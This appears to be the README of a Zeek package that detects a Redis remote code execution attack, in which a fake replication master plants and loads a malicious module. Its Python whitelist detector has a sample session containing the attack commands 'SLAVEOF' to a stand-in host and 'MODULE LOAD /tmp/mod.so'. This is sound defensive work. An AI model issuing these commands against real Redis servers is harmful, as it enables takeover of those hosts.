Redis RCE Detection
This is a detection for a simple Redis remote code execution (RCE).
Usage
Install this package with zkg:
$ zkg install redis-rce
Then, execute Zeek with the scripts:
$ zeek redis-rce/export/whitelist-commands -r tests/Traces/exploit.pcap
$ zeek redis-rce/export/elf-transfer -r tests/Traces/exploit.pcap
Both should produce notice.log for the exploit.
The exploit
In Redis, you can load additional commands from a .so file. The example here uses a library file from this repo. Loading it into Redis gives the client more commands to execute.
On some unauthenticated Redis instances, a malicious actor can plant this library file on the server by making the transfer look like a database resync from a replication master. You can see how that is done here.
The detection
There are multiple ways to detect this.
The most obvious is to detect the ELF file transfer. This only fires if the malicious actor got all the way to a database resync. The file also arrives over the replication channel to a replica instance, which is not strictly covered by the Redis RESP protocol specification, so this detection is relatively brittle.
You may also simply whitelist the commands clients are allowed to run and raise a notice for any command that is not on the list. This is the preferred method, since it also catches attempts that fail for various reasons.
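As an added stand-alone illustration of the whitelist approach (not the package's Zeek script), the following parses a constructed RESP client stream and returns a notice for every command whose name is not on a constructed whitelist; it also accepts Redis's inline command form, so a client that avoids the array framing is not missed.

```python
"""Whitelist detection of Redis client commands over a raw RESP byte stream."""
from typing import Iterator

# Constructed whitelist: only the commands this client is expected to issue.
ALLOWED_COMMANDS = {"PING", "GET", "SET", "DEL", "EXISTS", "EXPIRE"}

def parse_resp_commands(stream: bytes) -> Iterator[list[bytes]]:
    """Yield each client command as a list of byte-string arguments.

    Accepts RESP arrays of bulk strings and the inline form ("GET foo") Redis
    also honours; raises ValueError on a malformed or truncated frame.
    """
    pos = 0
    while pos < len(stream):
        end = stream.index(b"\r\n", pos)
        if stream[pos:pos + 1] != b"*":  # inline command: whitespace-separated
            yield stream[pos:end].split()
            pos = end + 2
            continue
        count, pos, args = int(stream[pos + 1:end]), end + 2, []
        for _ in range(count):
            if stream[pos:pos + 1] != b"$":
                raise ValueError(f"expected bulk string at offset {pos}")
            end = stream.index(b"\r\n", pos)
            length, pos = int(stream[pos + 1:end]), end + 2
            if pos + length + 2 > len(stream):
                raise ValueError(f"truncated bulk string at offset {pos}")
            args.append(stream[pos:pos + length])
            pos += length + 2  # payload plus its trailing CRLF
        yield args

def find_unlisted_commands(stream: bytes, allowed=ALLOWED_COMMANDS) -> list[str]:
    """Return one notice string per command whose name is not on the whitelist."""
    notices = []
    for args in parse_resp_commands(stream):
        if not args:
            continue
        name = args[0].decode("ascii", "replace").upper()  # names are case-insensitive
        if name not in allowed:
            rendered = " ".join(a.decode("utf-8", "replace") for a in args)
            notices.append(f"Redis command not on whitelist: {rendered}")
    return notices

# Constructed sample session: normal traffic, then the two steps the exploit
# relies on (pointing the server at a fake master, then loading a module).
SAMPLE = (
    b"*2\r\n$3\r\nGET\r\n$3\r\nfoo\r\n"
    b"*3\r\n$7\r\nSLAVEOF\r\n$10\r\n192.0.2.10\r\n$4\r\n6379\r\n"
    b"MODULE LOAD /tmp/mod.so\r\n"
)
```

Running `find_unlisted_commands(SAMPLE)` yields two notices, one for the replication command and one for the module load, while the ordinary GET passes silently.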